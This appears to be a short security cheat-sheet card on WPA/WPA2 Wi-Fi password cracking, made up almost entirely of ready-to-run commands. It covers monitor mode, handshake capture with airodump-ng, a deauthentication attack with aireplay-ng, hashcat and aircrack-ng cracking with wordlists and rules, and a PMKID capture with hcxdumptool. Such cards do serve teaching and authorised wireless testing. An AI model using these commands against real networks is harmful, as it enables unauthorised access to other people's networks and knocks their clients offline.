High Severity | T1552
📶 WPA/WPA2 Cracking
🤝 Handshake Capture
# Put interface in monitor mode airmon-ng start wlan0 iwconfig wlan0mon mode monitor # Scan for targets airodump-ng wlan0mon # Capture handshake airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Deauth attack to force reconnection aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon
🔓 Cracking
# Convert to hccapx for hashcat hcxpcaptool -o output.hccapx input.pcap # Crack with hashcat hashcat -m 2500 output.hccapx wordlist.txt # Or use aircrack aircrack-ng -w wordlist.txt capture-01.cap # GPU optimization hashcat -m 2500 -d 1 output.hccapx wordlist.txt # Rules-based cracking hashcat -m 2500 output.hccapx wordlist.txt -r rules/best64.rule
💡 PMKID Attack (No Handshake)
# Capture PMKID hcxdumptool -i wlan0mon -o output.pcap --filterlist=targets.txt --enable_status # Convert hcxpcaptool -o hashes.txt output.pcap # Crack hashcat -m 16800 hashes.txt wordlist.txt